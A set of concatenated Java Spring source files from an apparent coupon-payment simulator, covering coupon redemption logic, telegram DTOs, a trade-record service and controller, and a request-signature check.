private TradeSeqService tradeSeqService;
@Autowired
private TradeInfoService tradeInfoService;
/** Coupon redeemed: 1 */
private static final String USED_FLG_1 = "1";
/** Coupon not redeemed: 0 */
private static final String USED_FLG_0 = "0";
/** 1: redemption-check fault */
private static final String USE_CONFIRM_FAULT = "1";
/** 2: redemption check 408 */
private static final String USE_CONFIRM_408 = "2";
/** 3: redemption check 504 */
private static final String USE_CONFIRM_504 = "3";
/** 4: redemption check 400 */
private static final String USE_CONFIRM_400 = "4";
/** 1: redemption fault */
private static final String USE_FAULT = "1";
/** 2: redemption 408 */
private static final String USE_408 = "2";
/** 3: redemption 504 */
private static final String USE_504 = "3";
/** 4: redemption 400 */
private static final String USE_400 = "4";
/** Screen amount-input control flag: "0" = no input */
private static final String KINGK_EXIST_FLG_OFF = "0";
/** Incentive offer type: "2" = gift */
private static final String GIFT = "2";
/** Trade control flag: "4" = unachieved */
private static final String UNACHIEVED = "4";
@RequestMapping(value = CommonConst.USE, method = {
RequestMethod.POST }, consumes = MediaType.APPLICATION_JSON_VALUE)
public String runUse(@Validated @RequestBody String strBody) {
log.info("クーポン消込処理を開始");
log.info("クーポン消込要求電文:" + strBody);
// Initialization
ResponseTeleIF29Dto if29Dto = new ResponseTeleIF29Dto();
String responseStr = "";
// Parse the received telegram
RequestTeleIF30Dto if30Dto = CommonUtil.jsonConvertObject(strBody, RequestTeleIF30Dto.class);
// If parsing the received telegram returns null, respond with status code 400
if (if30Dto == null) {
throw new HttpStatus400Exception();
}
// Retrieve the coupon user information
LoginMngmtEntity loginInfo = loginMngmtService.findByPk(if30Dto.getTerminalLoginId());
// If the coupon user lookup returns no record
if (loginInfo == null) {
if29Dto.setResultCode(1);
if29Dto.setErrorCode("100003");
if29Dto.setErrorMessage("利用できないクーポンです。");
} else {
// Check the usage-processing result control flags
// Communication error 408
if ((USE_CONFIRM_408.equals(loginInfo.getUseOffControl()) && USED_FLG_0.equals(if30Dto.getCouponUsedFlg()))
|| (USE_408.equals(loginInfo.getUseOnControl()) && USED_FLG_1.equals(if30Dto.getCouponUsedFlg()))) {
throw new HttpStatus408Exception();
// Communication error 504
} else if ((USE_CONFIRM_504.equals(loginInfo.getUseOffControl()) && USED_FLG_0.equals(if30Dto.getCouponUsedFlg()))
|| (USE_504.equals(loginInfo.getUseOnControl()) && USED_FLG_1.equals(if30Dto.getCouponUsedFlg()))) {
throw new HttpStatus504Exception();
// Communication error 400
} else if ((USE_CONFIRM_400.equals(loginInfo.getUseOffControl()) && USED_FLG_0.equals(if30Dto.getCouponUsedFlg()))
|| (USE_400.equals(loginInfo.getUseOnControl()) && USED_FLG_1.equals(if30Dto.getCouponUsedFlg()))) {
throw new HttpStatus400Exception();
// Redemption-check fault
} else if (USE_CONFIRM_FAULT.equals(loginInfo.getUseOffControl())
&& USED_FLG_0.equals(if30Dto.getCouponUsedFlg())) {
if29Dto.setResultCode(1);
if29Dto.setErrorCode("100004");
if29Dto.setErrorMessage("本クーポンはご利用頂けません。");
// Redemption fault
} else if (USE_FAULT.equals(loginInfo.getUseOnControl()) && USED_FLG_1.equals(if30Dto.getCouponUsedFlg())) {
if29Dto.setResultCode(1);
if29Dto.setErrorCode("100005");
if29Dto.setErrorMessage("本クーポンはご利用頂けません。");
} else {
// Retrieve the coupon information
CouponInfoEntity couponInfo = couponInfoService
.findOne(if30Dto.getPartnerCompUserID());
// If no coupon information was found
if (couponInfo == null) {
log.error("クーポン属性テーブルから情報取得出来ません。");
log.error("キャンペーンIDと紐づく情報がありません。");
throw new HttpStatus500Exception();
} else if (Double.valueOf(if30Dto.getTransactionKingk()) > couponInfo.getBalance()) {
if29Dto.setResultCode(1);
if29Dto.setErrorCode("100006");
if29Dto.setErrorMessage("ご利用可能額を超えています。再度ご確認お願いします。");
} else {
TeleIF29DataDto data = new TeleIF29DataDto();
// With coupon redemption
if (USED_FLG_1.equals(if30Dto.getCouponUsedFlg())) {
data = couponUseProssecing(couponInfo, if30Dto);
} else {
data = couponConfirmUseProssecing(couponInfo, if30Dto);
}
if29Dto.setData(data);
// Set result code 0 (normal)
if29Dto.setResultCode(0);
// If the trade control flag is "unachieved"
if (UNACHIEVED.equals(couponInfo.getRegistCancelDivision())) {
if29Dto.setErrorCode("I00006");
if29Dto.setErrorMessage("未達エラーメッセージ");
}
}
}
}
// Set the processing datetime on the response telegram
String time = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date());
if29Dto.setTime(time);
// Convert the response telegram to a JSON string
responseStr = CommonUtil.convertJson(if29Dto);
log.info("クーポン消込応答電文:" + responseStr);
log.info("クーポン消込処理を終了");
// Return the response telegram
return responseStr;
}
/**
* Builds the response telegram data for coupon usage confirmation (no redemption).
*
* @param couponInfo coupon information entity
* @param if30Dto request telegram DTO
* @return TeleIF29DataDto response data section
*/
private TeleIF29DataDto couponConfirmUseProssecing(final CouponInfoEntity couponInfo,
final RequestTeleIF30Dto if30Dto) {
// Initialize the response telegram data section
TeleIF29DataDto if29Data = new TeleIF29DataDto();
// When no amount input is required
if (KINGK_EXIST_FLG_OFF.equals(couponInfo.getKingkExistFlg())) {
// Gift type
if (GIFT.equals(couponInfo.getIncentiveOfferType())) {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk((double) 0);
if29Data.setDiscountKingk((double) 0);
// Non-gift type
} else if (Integer.valueOf(if30Dto.getTransactionKingk()) == 0) {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk((double) 0 - couponInfo.getDiscountKingk());
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
} else {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk(Double.valueOf(if30Dto.getTransactionKingk()) - couponInfo.getDiscountKingk());
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
}
// When amount input is required
} else {
if29Data.setTransactionKingk(Double.valueOf(if30Dto.getTransactionKingk()));
if29Data.setAfterDiscountKingk(Double.valueOf(if30Dto.getTransactionKingk()) - couponInfo.getDiscountKingk());
// Gift type
if (GIFT.equals(couponInfo.getIncentiveOfferType())) {
if29Data.setDiscountKingk((double) 0);
// Non-gift type
} else {
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
}
}
return if29Data;
}
/**
* Builds the response telegram data for coupon redemption.
*
* @param couponInfo coupon information entity
* @param if30Dto request telegram DTO
* @return TeleIF29DataDto response data section
*/
private TeleIF29DataDto couponUseProssecing(final CouponInfoEntity couponInfo,
final RequestTeleIF30Dto if30Dto) {
// Initialize the response telegram data section
TeleIF29DataDto if29Data = new TeleIF29DataDto();
// Get the current datetime
Date date = new Date();
/** ▼ Generate the transaction ID ▼ **/
SimpleDateFormat simpleDateFormat = new SimpleDateFormat("yyyyMMdd");
String strDate = simpleDateFormat.format(date);
String transactionID = strDate.concat(tradeSeqService.getSeq());
/** ▲ Generate the transaction ID ▲ **/
/** ▼ Set the campaign usage datetime ▼ **/
SimpleDateFormat simpleDate = new SimpleDateFormat("yyyyMMddHHmmss");
String campaignUseDatetime = simpleDate.format(date);
/** ▲ Set the campaign usage datetime ▲ **/
// When no amount input is required
if (KINGK_EXIST_FLG_OFF.equals(couponInfo.getKingkExistFlg())) {
// Gift type
if (GIFT.equals(couponInfo.getIncentiveOfferType())) {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk((double) 0);
if29Data.setDiscountKingk((double) 0);
// Non-gift type
} else if (Integer.valueOf(if30Dto.getTransactionKingk()) == 0) {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk((double) 0 - couponInfo.getDiscountKingk());
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
} else {
if29Data.setTransactionKingk((double) 0);
if29Data.setAfterDiscountKingk(Double.valueOf(if30Dto.getTransactionKingk()) - couponInfo.getDiscountKingk());
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
}
// When amount input is required
} else {
if29Data.setTransactionKingk(Double.valueOf(if30Dto.getTransactionKingk()));
if29Data.setAfterDiscountKingk(Double.valueOf(if30Dto.getTransactionKingk()) - couponInfo.getDiscountKingk());
// Gift type
if (GIFT.equals(couponInfo.getIncentiveOfferType())) {
if29Data.setDiscountKingk((double) 0);
// Non-gift type
} else {
if29Data.setDiscountKingk(couponInfo.getDiscountKingk());
}
}
/** ▼ Calculate the remaining coupon usage count ▼ **/
String couponRemainUseNum = "";
if (couponInfo.getCouponRemainUseNum() < 0) {
couponRemainUseNum = "-1";
} else {
couponRemainUseNum = String.valueOf(couponInfo.getCouponRemainUseNum() - 1);
}
if29Data.setCouponRemainUseNum(couponRemainUseNum);
/** ▲ Calculate the remaining coupon usage count ▲ **/
if29Data.setTransactionID(transactionID);
if29Data.setCampaignUseDatetime(campaignUseDatetime);
if29Data.setPartnerCompUserID(couponInfo.getPartnerCompUserId());
/** ▼ Persist the trade information to the DB ▼ **/
TradeInfoEntity tradeInfoInsert = new TradeInfoEntity();
tradeInfoInsert.setTransactionId(transactionID);
tradeInfoInsert.setPartnerCompUserId(if29Data.getPartnerCompUserID());
tradeInfoInsert.setTransactionKingk(if29Data.getTransactionKingk());
tradeInfoInsert.setAfterDiscountKingk(if29Data.getAfterDiscountKingk());
tradeInfoInsert.setDiscountKingk(if29Data.getDiscountKingk());
tradeInfoInsert.setIncentiveOfferType(couponInfo.getIncentiveOfferType());
tradeInfoInsert.setCampaignName(couponInfo.getCampaignName());
tradeInfoInsert.setCampaignComment(couponInfo.getCampaignComment());
tradeInfoInsert.setRegistCancelDivision(couponInfo.getRegistCancelDivision());
tradeInfoInsert.setStatus("0");
tradeInfoInsert.setTerminalLoinId(if30Dto.getTerminalLoginId());
tradeInfoInsert.setCouponRemainUseNum(couponRemainUseNum);
tradeInfoService.insertByValue(tradeInfoInsert);
/** ▲ Persist the trade information to the DB ▲ **/
/** ▼ Persist the coupon balance information to the DB ▼ **/
Double balance = couponInfo.getBalance() - couponInfo.getDiscountKingk();
couponInfo.setBalance(balance);
couponInfo.setCouponRemainUseNum(Integer.valueOf(couponRemainUseNum));
couponInfoService.save(couponInfo);
/** ▲ Persist the coupon balance information to the DB ▲ **/
return if29Data;
}
@ResponseStatus(value = HttpStatus.REQUEST_TIMEOUT)
private class HttpStatus408Exception extends RuntimeException {
private static final long serialVersionUID = 3303072281551296489L;
}
@ResponseStatus(value = HttpStatus.GATEWAY_TIMEOUT)
private class HttpStatus504Exception extends RuntimeException {
private static final long serialVersionUID = 7604508793140677611L;
}
@ResponseStatus(value = HttpStatus.BAD_REQUEST)
private class HttpStatus400Exception extends RuntimeException {
private static final long serialVersionUID = 2217588269501541903L;
}
@ResponseStatus(value = HttpStatus.INTERNAL_SERVER_ERROR)
private class HttpStatus500Exception extends RuntimeException {
private static final long serialVersionUID = 1300406671277144724L;
}
}
<file_sep>/*
* File name    TeleIF21DataDto.java
* System       Next-generation payment system (online)
* Copyright    Copyright(C) 2018 NTT DATA CORPORATION
* Company      NJK
* Created      2018/03/20
* Author       NJK 戦彦鵬
* History
* 2018/03/20 NJK 戦彦鵬 Initial version
*/
package com.simulator.telegram.if22;
import java.io.Serializable;
/**
* IF21 coupon usage confirmation response DTO (data section).
*
* @author NJK
* @version 1.0 2018/03/20
*/
public class TeleIF21DataDto implements Serializable {
/**
* Serial version UID.
*/
private static final long serialVersionUID = 7264749228299698705L;
/**
* Campaign ID.
*/
private String campaignID = "";
/**
* Campaign name.
*/
private String campaignName = "";
/**
* Campaign description.
*/
private String campaignComment = "";
/**
* Incentive offer type.
*/
private String incentiveOfferType = "";
/**
* Amount-input setting flag.
*/
private String kingkExistFlg = "";
/**
* Minimum amount.
*/
private String targetKingkMin = "";
/**
* Partner company user ID.
*/
private String partnerCompUserID = "";
/**
* Gets the campaign ID.
*
* @return campaignID the campaign ID
*/
public final String getCampaignID() {
return campaignID;
}
/**
* Sets the campaign ID.
*
* @param campaignID
* the campaign ID
*/
public final void setCampaignID(final String campaignID) {
this.campaignID = campaignID;
}
/**
* Gets the campaign name.
*
* @return campaignName the campaign name
*/
public final String getCampaignName() {
return campaignName;
}
/**
* Sets the campaign name.
*
* @param campaignName
* the campaign name
*/
public final void setCampaignName(final String campaignName) {
this.campaignName = campaignName;
}
/**
* Gets the campaign description.
*
* @return campaignComment the campaign description
*/
public final String getCampaignComment() {
return campaignComment;
}
/**
* Sets the campaign description.
*
* @param campaignComment
* the campaign description
*/
public final void setCampaignComment(final String campaignComment) {
this.campaignComment = campaignComment;
}
/**
* Gets the incentive offer type.
*
* @return incentiveOfferType the incentive offer type
*/
public final String getIncentiveOfferType() {
return incentiveOfferType;
}
/**
* Sets the incentive offer type.
*
* @param incentiveOfferType
* the incentive offer type
*/
public final void setIncentiveOfferType(final String incentiveOfferType) {
this.incentiveOfferType = incentiveOfferType;
}
/**
* Gets the amount-input setting flag.
*
* @return kingkExistFlg the amount-input setting flag
*/
public final String getKingkExistFlg() {
return kingkExistFlg;
}
/**
* Sets the amount-input setting flag.
*
* @param kingkExistFlg
* the amount-input setting flag
*/
public final void setKingkExistFlg(final String kingkExistFlg) {
this.kingkExistFlg = kingkExistFlg;
}
/**
* Gets the minimum amount.
*
* @return targetKingkMin the minimum amount
*/
public final String getTargetKingkMin() {
return targetKingkMin;
}
/**
* Sets the minimum amount.
*
* @param targetKingkMin
* the minimum amount
*/
public final void setTargetKingkMin(final String targetKingkMin) {
this.targetKingkMin = targetKingkMin;
}
/**
* Gets the partner company user ID.
*
* @return partnerCompUserID the partner company user ID
*/
public final String getPartnerCompUserID() {
return partnerCompUserID;
}
/**
* Sets the partner company user ID.
*
* @param partnerCompUserID
* the partner company user ID
*/
public final void setPartnerCompUserID(final String partnerCompUserID) {
this.partnerCompUserID = partnerCompUserID;
}
/**
* Returns a string representation of the object.
*
* @return string representation of the object
*/
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("campaignID=");
builder.append(getCampaignID());
builder.append(",campaignName=");
builder.append(getCampaignName());
builder.append(",campaignComment=");
builder.append(getCampaignComment());
builder.append(",incentiveOfferType=");
builder.append(getIncentiveOfferType());
builder.append(",kingkExistFlg=");
builder.append(getKingkExistFlg());
builder.append(",targetKingkMin=");
builder.append(getTargetKingkMin());
builder.append(",partnerCompUserID=");
builder.append(getPartnerCompUserID());
builder.append("]");
return builder.toString();
}
}
<file_sep>/*
* File name    ResponseTeleHeaderDto.java
* System       Next-generation payment system (online)
* Copyright    Copyright(C) 2018 NTT DATA CORPORATION
* Company      NJK
* Created      2018/03/16
* Author       NJK 戦彦鵬
* History
* 2018/03/16 NJK 戦彦鵬 Initial version
*/
package com.simulator.telegram;
import java.io.Serializable;
/**
* Common header DTO for response telegrams.
*
* @author NJK
* @version 1.0 2018/03/16
*/
public class ResponseTeleHeaderDto implements Serializable {
/**
* Serial version UID.
*/
private static final long serialVersionUID = -7992225098910748173L;
/**
* Processing datetime.
*/
private String time = "";
/**
* Processing result.
*/
private Integer resultCode = null;
/**
* Error code.
*/
private String errorCode = "";
/**
* Gets the processing datetime.
*
* @return time the processing datetime
*/
public final String getTime() {
return time;
}
/**
* Sets the processing datetime.
*
* @param time
* the processing datetime
*/
public final void setTime(final String time) {
this.time = time;
}
/**
* Gets the processing result.
*
* @return resultCode the processing result
*/
public final Integer getResultCode() {
return resultCode;
}
/**
* Sets the processing result.
*
* @param resultCode
* the processing result
*/
public final void setResultCode(final Integer resultCode) {
this.resultCode = resultCode;
}
/**
* Gets the error code.
*
* @return errorCode the error code
*/
public final String getErrorCode() {
return errorCode;
}
/**
* Sets the error code.
*
* @param errorCode
* the error code
*/
public final void setErrorCode(final String errorCode) {
this.errorCode = errorCode;
}
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("time:").append(getTime());
builder.append(", resultCode:").append(getResultCode());
builder.append(", errorCode:").append(getErrorCode());
return builder.toString();
}
}
<file_sep>package com.simulator.dataservice.Service;
import java.util.List;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Transactional;
import com.simulator.dataservice.entity.TradeInfoEntity;
import com.simulator.dataservice.mapper.TradeInfoMapMapper;
import com.simulator.dataservice.repository.TradeInfoRepository;
@Service
public class TradeInfoService {
@Autowired
private TradeInfoMapMapper tradeInfoMapMapper;
@Autowired
private TradeInfoRepository tradeInfoRepository;
/** Gets the trade list (by login ID and date). */
@Transactional
public List<TradeInfoEntity> selectTradeListByValue(TradeInfoEntity tradeInfoEntity) {
return tradeInfoMapMapper.selectTradeListByValue(tradeInfoEntity);
}
/** Gets the trade detail information. */
@Transactional
public TradeInfoEntity selectByPk(String transactionId) {
return tradeInfoMapMapper.selectByPk(transactionId);
}
/** Registers trade information. */
@Transactional
public void insertByValue(TradeInfoEntity tradeInfoEntity) {
tradeInfoMapMapper.insertByValue(tradeInfoEntity);
}
/** Updates the trade status. */
@Transactional
public void updateStsByPk(TradeInfoEntity tradeInfoEntity) {
tradeInfoMapMapper.updateStsByPk(tradeInfoEntity);
}
/** Gets the trade detail information. */
@Transactional
public TradeInfoEntity getTradeInfo(String transactionId) {
return tradeInfoRepository.getOne(transactionId);
}
/** Saves the modified trade information. */
@Transactional
public void save(TradeInfoEntity tradeInfoEntity) {
tradeInfoRepository.save(tradeInfoEntity);
}
/** Gets all trade information. */
@Transactional
public List<TradeInfoEntity> findAll() {
return tradeInfoRepository.findAll();
}
/** Deletes trade information by transaction ID. */
@Transactional
public void deleteById(String transactionId) {
tradeInfoRepository.deleteById(transactionId);
}
}<file_sep>package com.simulator.webservice.controller.trade;
import java.util.ArrayList;
import java.util.Collections;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import com.simulator.dataservice.Service.TradeInfoService;
import com.simulator.dataservice.entity.TradeInfoEntity;
@Controller
@RequestMapping("/trades")
public class TradeConfirmController {
@Autowired
private TradeInfoService tradeInfoService;
/**
* Items used to render the status selection
*/
final static Map<String, String> SELECT_STATUS = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0(未取消)", "0");
put("1(取消済み)", "1");
}
});
/**
* Items used to display the status
*/
final static Map<String, String> DISPLAY_STATUS = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0", "0(未取消)");
put("1", "1(取消済み)");
}
});
/**
* Items used to render the trade-division selection
*/
final static Map<String, String> SELECT_REGIST_CANCEL_DIVISION = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("1:利用", "1");
put("2:取消", "2");
put("3:失敗", "3");
put("4:未達", "4");
}
});
/**
* Items used to display the trade division
*/
final static Map<String, String> DISPLAY_REGIST_CANCEL_DIVISION = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("1", "1:利用");
put("2", "2:取消");
put("3", "3:失敗");
put("4", "4:未達");
}
});
/**
* Items used to display the incentive offer type
*/
final static Map<String, String> DISPLAY_Offer_Type = Collections
.unmodifiableMap(new LinkedHashMap<String, String>() {
/**
*
*/
private static final long serialVersionUID = 1L;
{
put("0", "0(割引)");
put("1", "1(キャッシュバック)");
put("2", "2(ギフト)");
}
});
@GetMapping
public String index(Model model) {
List<TradeInfoEntity> info = tradeInfoService.findAll();
List<TradeInfoEntity> screenList = new ArrayList<TradeInfoEntity>();
for (TradeInfoEntity tradeInfoDto : info) {
tradeInfoDto.setIncentiveOfferType(DISPLAY_Offer_Type.get(tradeInfoDto.getIncentiveOfferType()));
tradeInfoDto.setRegistCancelDivision(DISPLAY_REGIST_CANCEL_DIVISION.get(tradeInfoDto.getRegistCancelDivision()));
tradeInfoDto.setStatus(DISPLAY_STATUS.get(tradeInfoDto.getStatus()));
screenList.add(tradeInfoDto);
}
model.addAttribute("tradeInfo", screenList);
return "trades/tradeInfo";
}
@GetMapping("{transactionId}/edit")
public String edit(@PathVariable String transactionId, Model model) {
TradeInfoEntity tradeInfo = tradeInfoService.getTradeInfo(transactionId);
model.addAttribute("tradeInfo", tradeInfo);
model.addAttribute("selectStatus", SELECT_STATUS);
model.addAttribute("selectRCD", SELECT_REGIST_CANCEL_DIVISION);
return "trades/edit";
}
@GetMapping("{transactionId}")
public String show(@PathVariable String transactionId, Model model) {
TradeInfoEntity tradeInfo = tradeInfoService.getTradeInfo(transactionId);
tradeInfo.setIncentiveOfferType(DISPLAY_Offer_Type.get(tradeInfo.getIncentiveOfferType()));
tradeInfo.setRegistCancelDivision(DISPLAY_REGIST_CANCEL_DIVISION.get(tradeInfo.getRegistCancelDivision()));
tradeInfo.setStatus(DISPLAY_STATUS.get(tradeInfo.getStatus()));
model.addAttribute("tradeInfo", tradeInfo);
return "trades/show";
}
@PutMapping("{transactionId}")
public String update(@PathVariable String transactionId, @ModelAttribute TradeInfoEntity tradeInfoEntity) {
TradeInfoEntity info = tradeInfoService.getTradeInfo(transactionId);
info.setRegistCancelDivision(tradeInfoEntity.getRegistCancelDivision());
info.setStatus(tradeInfoEntity.getStatus());
tradeInfoService.save(info);
return "redirect:/trades";
}
@DeleteMapping("{transactionId}")
public String destroy(@PathVariable String transactionId) {
tradeInfoService.deleteById(transactionId);
return "redirect:/trades";
}
}
<file_sep>/*
* HTTP JSON communication package.
*/
package com.simulator.http;<file_sep>/*
* File name    TeleIF33DataDto.java
* System       Next-generation payment system (online)
* Copyright    Copyright(C) 2018 NTT DATA CORPORATION
* Company      NJK
* Created      2018/03/30
* Author       NJK 姜春雷
* History
* 2018/03/30 NJK 姜春雷 Initial version
*/
package com.simulator.telegram.if34;
import java.io.Serializable;
/**
* IF33 coupon usage cancellation response DTO (data section).
*
* @author NJK
* @version 1.0 2018/03/30
*/
public class TeleIF33DataDto implements Serializable {
/**
* Serial version UID.
*/
private static final long serialVersionUID = 6876409587034598923L;
/**
* Coupon transaction ID (cancellation).
*/
private String transactionID = "";
/**
* Campaign usage cancellation datetime.
*/
private String campaignUseDatetime = "";
/**
* Gets the coupon transaction ID (cancellation).
*
* @return transactionID the coupon transaction ID (cancellation)
*/
public final String getTransactionID() {
return transactionID;
}
/**
* Sets the coupon transaction ID (cancellation).
*
* @param transactionID
* the coupon transaction ID (cancellation)
*/
public final void setTransactionID(final String transactionID) {
this.transactionID = transactionID;
}
/**
* Gets the campaign usage cancellation datetime.
*
* @return campaignUseDatetime the campaign usage cancellation datetime
*/
public final String getCampaignUseDatetime() {
return campaignUseDatetime;
}
/**
* Sets the campaign usage cancellation datetime.
*
* @param campaignUseDatetime
* the campaign usage cancellation datetime
*/
public final void setCampaignUseDatetime(final String campaignUseDatetime) {
this.campaignUseDatetime = campaignUseDatetime;
}
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("transactionID=");
builder.append(getTransactionID());
builder.append(",campaignUseDatetime=");
builder.append(getCampaignUseDatetime());
builder.append("]");
return builder.toString();
}
}
<file_sep>package com.simulator.common;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import java.util.Map;
import org.jboss.logging.Logger;
import com.google.gson.Gson;
import com.simulator.common.util.SHAUtil;
public class RequestJsonCheckUtil {
private static final Logger log = Logger.getLogger(RequestJsonCheckUtil.class);
@SuppressWarnings("unchecked")
public static boolean requestCheck(String postData) {
if (postData == null) {
log.error("PostDataがありません。");
return false;
}
Gson gson = new Gson();
Map<String, String> params = gson.fromJson(
postData, Map.class);
List<Map.Entry<String, String>> fieldList =
new ArrayList<Map.Entry<String, String>>(
params.entrySet());
// Sort the fields in ASCII order by key
Collections.sort(
fieldList, new Comparator<Map.Entry<String, String>>() {
public int compare(Map.Entry<String, String> o1,
Map.Entry<String, String> o2) {
return (o1.getKey()).toString().compareTo(o2.getKey());
}
});
StringBuilder requestParamSb = new StringBuilder();
// Build the signature base string ("key=value" pairs joined with "&"), excluding identityInfoText
for (int i = 0; i < fieldList.size(); i++) {
if ("identityInfoText".equals(fieldList.get(i).getKey())) {
continue;
}
requestParamSb.append(fieldList.get(i).getKey());
requestParamSb.append("=");
requestParamSb.append(fieldList.get(i).getValue());
if (i != fieldList.size() - 1) {
requestParamSb.append("&");
}
}
// Verify the identity information (signature)
boolean shaFlag = SHAUtil.CheckSign(
requestParamSb.toString(),
params.get("identityInfoText"));
// If it does not match, treat the request as unauthenticated and abort processing
if (!shaFlag) {
return false;
}
return true;
}
}
<file_sep>package com.simulator.dataservice.repository;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.JpaSpecificationExecutor;
import org.springframework.data.repository.CrudRepository;
import com.simulator.dataservice.entity.LoginMngmtEntity;
public interface LoginMngmtRepository
extends JpaRepository<LoginMngmtEntity, String>, JpaSpecificationExecutor<LoginMngmtEntity> {
LoginMngmtEntity findByTerminalLoginId(String terminalLoginId);
}
<file_sep>package com.simulator.webservice.controller.couponconfirm;
import lombok.Getter;
import lombok.Setter;
@Getter
@Setter
public class CouponInfoDto {
private String partnerCompUserId;
private String campaignId;
private String campaignName;
private String campaignComment;
private String incentiveOfferType;
private String kingkExistFlg;
private String targetKingkMin;
private String registCancelDivision;
private Double balance;
private Integer couponRemainUseNum;
private Double discountKingk;
}
<file_sep>/*
* File name    RequestTeleIF42Dto.java
* System       Next-generation payment system (online)
* Copyright    Copyright(C) 2018 NTT DATA CORPORATION
* Company      NJK
* Created      2018/03/20
* Author       NJK 戦彦鵬
* History
* 2018/03/20 NJK 戦彦鵬 Initial version
*/
package com.simulator.telegram.if42;
import com.simulator.telegram.RequestTeleHeaderDto;
/**
* IF42 password change request DTO.
*
* @author NJK
* @version 1.0 2018/03/20
*/
public class RequestTeleIF42Dto extends RequestTeleHeaderDto {
/**
* Serial version UID.
*/
private static final long serialVersionUID = -4870061960321478537L;
/**
* Password before the change.
*/
private String password = "";
/**
* Password after the change.
*/
private String newPassword = null;
/**
* Gets the password before the change.
*
* @return password the password before the change
*/
public final String getPassword() {
return password;
}
/**
* Sets the password before the change.
*
* @param password
* the password before the change
*/
public final void setPassword(final String password) {
this.password = password;
}
/**
* Gets the password after the change.
*
* @return newPassword the password after the change
*/
public final String getNewPassword() {
return newPassword;
}
/**
* Sets the password after the change.
*
* @param newPassword
* the password after the change
*/
public final void setNewPassword(final String newPassword) {
this.newPassword = newPassword;
}
/**
* Returns a string representation of the object.
*
* @return string representation of the object
*/
@Override
public String toString() {
StringBuilder builder = new StringBuilder();
builder.append("[");
builder.append("identityInfoText=");
builder.append(getIdentityInfoText());
builder.append(",requestTime=");
builder.append(getRequestTime());
builder.append(",tid=");
builder.append(getTid());
builder.append(",makerCd=");
builder.append(getMakerCd());
builder.append(",osVersion=");
builder.append(getOsVersion());
builder.append(",appCd=");
builder.append(getAppCd());
builder.append(",app=");
builder.append(getApp());
builder.append("]");
return builder.toString();
}
}
<file_sep>/*
* File name       TeleIF29DataDto.java
* System          Next-generation payment system full-scale support (online)
* Copyright       Copyright(C) 2018 NTT DATA CORPORATION
* Company         NJK
* Created         2018/03/20
* Author          NJK 戦彦鵬
* Revision history
*     2018/03/20 NJK 戦彦鵬 Initial version
*/
package com.simulator.telegram.if30;
import java.io.Serializable;
/**
* IF29 coupon redemption information response DTO (data part).
*
* @author NJK
* @version 1.0 2018/03/20
*/
public class TeleIF29DataDto implements Serializable {
/**
* Serial version UID.
*/
private static final long serialVersionUID = 6176658897921372092L;
/**
* Transaction ID.
*/
private String transactionID = "";
/**
* Campaign usage date and time.
*/
private String campaignUseDatetime = "";
/**
* Transaction amount.
*/
private Double transactionKingk = null;
/**
* Amount after discount.
*/
private Double afterDiscountKingk = null;
/**
* Discount amount.
*/
private Double discountKingk = null;
/**
* Partner company user ID.
*/
private String partnerCompUserID = "";
/**
* Remaining coupon use count.
*/
private String couponRemainUseNum = "";
/**
* Gets the transaction ID.
*
* @return transactionID the transaction ID
*/
public final String getTransactionID() {
return transactionID;
}
/**
* Sets the transaction ID.
*
* @param transactionID
* the transaction ID
*/
public final void setTransactionID(final String transactionID) {
this.transactionID = transactionID;
}
/**
* Gets the campaign usage date and time.
*
* @return campaignUseDatetime the campaign usage date and time
*/
public final String getCampaignUseDatetime() {
return campaignUseDatetime;
}
/**
* Sets the campaign usage date and time.
*
* @param campaignUseDatetime
* the campaign usage date and time
*/
public final void setCampaignUseDatetime(final String campaignUseDatetime) {
this.campaignUseDatetime = campaignUseDatetime;
}
/**
* Gets the transaction amount.
*
* @return transactionKingk the transaction amount
*/
public final Double getTransactionKingk() {
return transactionKingk;
}
/**
* Sets the transaction amount.
*
* @param transactionKingk
* the transaction amount
*/
public final void setTransactionKingk(final Double transactionKingk) {
this.transactionKingk = transactionKingk;
}
/**
* Gets the amount after discount.
*
* @return afterDiscountKingk the amount after discount
*/
public final Double getAfterDiscountKingk() {
return afterDiscountKingk;
}
/**
* Sets the amount after discount.
*
* @param afterDiscountKingk
* the amount after discount
*/
public final void setAfterDiscountKingk(final Double afterDiscountKingk) {
this.afterDiscountKingk = afterDiscountKingk;
}
/**
* Gets the discount amount.
*
* @return discountKingk the discount amount
*/
public final Double getDiscountKingk() {
return discountKingk;
}
/**
* Sets the discount amount.
*
* @param discountKingk
* the discount amount
*/
public final void setDiscountKingk(final Double discountKingk) {
this.discountKingk = discountKingk;
}
/**
* Gets the partner company user ID.
*
